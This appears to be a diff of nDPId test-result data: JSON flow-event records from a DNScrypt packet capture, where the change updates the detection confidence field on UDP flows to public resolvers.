-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":40595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306433,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":49512,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305191,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":43633,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304367,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":59405,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":49518,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402354,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":44793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312103,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":46313,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305350,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":42570,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739620053,"flow_last_seen":946739620112,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":37711,"dst_port":443,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":39816,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305214,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":34885,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402354,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":53045,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348917,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":51647,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":37595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312183,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":40451,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":36668,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317493,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":53117,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305329,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":43505,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":59749,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400550,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":46140,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305453,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312406,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":47432,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348917,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":47621,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":46314,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304362,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":35005,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317431,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":47257,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312130,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":38812,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396210,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":54375,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396108,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":50277,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317428,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":37035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396110,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":44161,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318062,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":38511,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304818,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380984,"flow_last_seen":946739381021,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":51826,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396218,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":42141,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348803,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":43540,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304627,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380805,"flow_last_seen":946739380844,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":40775,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317810,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43776,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
